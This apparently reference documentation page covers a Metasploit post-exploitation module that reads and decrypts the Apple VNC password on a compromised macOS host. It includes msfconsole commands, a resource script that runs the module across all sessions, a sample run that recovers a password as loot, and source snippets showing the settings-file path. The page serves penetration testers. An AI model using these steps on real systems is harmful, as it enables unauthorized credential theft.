OS X Display Apple VNC Password - Metasploit
This page contains detailed information about how to use the post/osx/gather/vnc_password_osx metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: OS X Display Apple VNC Password
Module: post/osx/gather/vnc_password_osx
Source code: modules/post/osx/gather/vnc_password_osx.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module shows Apple VNC Password from Mac OS X High Sierra.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/osx/gather/vnc_password_osx
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/osx/gather/vnc_password_osx
msf post(vnc_password_osx) > show options
... show and set options ...
msf post(vnc_password_osx) > set SESSION session-id
msf post(vnc_password_osx) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/osx/gather/vnc_password_osx")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module shows Apple VNC Password from Mac OS X High Sierra.
The password can be set by visiting: System Preferences > Sharing > Screen Sharing > Computer Settings
- macOS 10.13.6
Verification Steps
- Start
msfconsole
- Get an OSX meterpreter session running as root
- Do:
use post/osx/gather/vnc_password_osx
- Do:
set SESSION [ID]
- Do:
run
- You should see the password
Scenarios
Typical run against an OSX session, with the vnc service activated:
msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx
msf5 post(osx/gather/vnc_password_osx) > set SESSION 1
SESSION => 1
msf5 post(osx/gather/vnc_password_osx) > exploit
[*] Checking VNC Password...
[+] Password Found: PoCpassw
[+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt
[*] Post module execution completed
msf5 post(osx/gather/vnc_password_osx) >
Go back to menu.
Msfconsole Usage
Here is how the osx/gather/vnc_password_osx post exploitation module looks in the msfconsole:
msf6 > use post/osx/gather/vnc_password_osx
msf6 post(osx/gather/vnc_password_osx) > show info
Name: OS X Display Apple VNC Password
Module: post/osx/gather/vnc_password_osx
Platform: OSX
Arch:
Rank: Normal
Provided by:
Kevin Gonzalvo <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module shows Apple VNC Password from Mac OS X High Sierra.
Module Options
This is a complete list of options available in the osx/gather/vnc_password_osx post exploitation module:
msf6 post(osx/gather/vnc_password_osx) > show options
Module options (post/osx/gather/vnc_password_osx):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the osx/gather/vnc_password_osx post exploitation module:
msf6 post(osx/gather/vnc_password_osx) > show advanced
Module advanced options (post/osx/gather/vnc_password_osx):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the osx/gather/vnc_password_osx module can do:
msf6 post(osx/gather/vnc_password_osx) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the osx/gather/vnc_password_osx post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(osx/gather/vnc_password_osx) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Root privileges are required to read VNC password file
Here is a relevant code snippet related to the "Root privileges are required to read VNC password file" error message:
40: return str.delete("\0")
41: end
42:
43: def run
44: unless is_root?
45: fail_with(Failure::NoAccess, "Root privileges are required to read VNC password file")
46: end
47: print_status("Checking VNC Password...")
48: vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
49: passwd_encrypt = read_file("#{vncsettings_path}")
50: final_passwd = decrypt_hash("#{passwd_encrypt}")
Password not found
Here is a relevant code snippet related to the "Password not found" error message:
58: post_reference_name: self.fullname,
59: private_type: :password,
60: private_data: final_passwd.to_s,
61: workspace_id: myworkspace_id
62: }
63: create_credential(credential_data)
64: else
65: print_error("Password not found")
66: end
67: end
68: end
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #10427 Merged Pull Request: Display Apple VNC Password (OSX)
Go back to menu.
See Also
Check also the following modules related to this module:
- post/osx/gather/apfs_encrypted_volume_passwd
- post/osx/gather/autologin_password
- post/osx/gather/enum_adium
- post/osx/gather/enum_airport
- post/osx/gather/enum_chicken_vnc_profile
- post/osx/gather/enum_colloquy
- post/osx/gather/enum_keychain
- post/osx/gather/enum_messages
- post/osx/gather/enum_osx
- post/osx/gather/gitignore
- post/osx/gather/hashdump
- post/osx/gather/password_prompt_spoof
- post/osx/gather/safari_lastsession
Authors
- Kevin Gonzalvo <interhack[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.